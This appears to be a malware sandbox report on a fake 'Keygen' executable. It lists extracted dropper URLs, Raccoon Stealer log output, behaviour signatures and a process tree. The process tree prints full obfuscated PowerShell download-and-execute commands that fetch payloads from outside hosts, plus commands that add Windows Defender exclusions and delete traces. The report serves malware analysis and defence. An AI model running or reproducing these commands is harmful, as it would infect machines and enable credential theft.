Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    154s
  • max time network
    164s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (8) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 02:22:01 GMT Bot_ID: 750D7400-3B08-415E-A8B0-2695D81425F5_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: UCQFZDUI - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (469 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 2 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 23 IoCs
  • Loads dropped DLL 49 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (8) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (8) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:828
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\958B.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (8) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1156
      • C:\Users\Admin\AppData\Local\Temp\958B.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1028
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\958B.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1616
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1864
          • C:\Users\Public\wlu.exe
            "C:\Users\Public\wlu.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2472
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2588
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2740
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2740 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\988243129607557\\* & exit
                  8⤵
                    PID:2992
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2740
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2416
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2616
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:924
              • C:\Users\Public\wlu.exe
                "C:\Users\Public\wlu.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                • Modifies system certificate store
                PID:2728
                • C:\Users\Admin\AppData\Local\Temp\7SWdhai2w2.exe
                  "C:\Users\Admin\AppData\Local\Temp\7SWdhai2w2.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:568
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\7SWdhai2w2.exe"'
                    8⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3024
                • C:\Users\Admin\AppData\Local\Temp\cTJAJxTpDJ.exe
                  "C:\Users\Admin\AppData\Local\Temp\cTJAJxTpDJ.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:1008
                  • C:\Windows\SysWOW64\Notepad.exe
                    "C:\Windows\System32\Notepad.exe"
                    8⤵
                      PID:2592
                  • C:\Users\Admin\AppData\Local\Temp\xS38vCwqXs.exe
                    "C:\Users\Admin\AppData\Local\Temp\xS38vCwqXs.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1884
                    • \??\c:\windows\SysWOW64\cmstp.exe
                      "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\b35nrbsc.inf
                      8⤵
                        PID:2144
                    • C:\Users\Admin\AppData\Local\Temp\rVZz2m6ncK.exe
                      "C:\Users\Admin\AppData\Local\Temp\rVZz2m6ncK.exe"
                      7⤵
                      • Executes dropped EXE
                      • Windows security modification
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2536
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" Get-MpPreference -verbose
                        8⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2624
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\wlu.exe"
                      7⤵
                        PID:1864
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /T 10 /NOBREAK
                          8⤵
                          • Delays execution with timeout.exe
                          PID:2724
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\958B.tmp\m1.hta"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1348
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1980
              • C:\Windows\SysWOW64\timeout.exe
                timeout 1
                3⤵
                • Delays execution with timeout.exe
                PID:1236
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\958B.tmp\b.hta"
                3⤵
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:1684
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
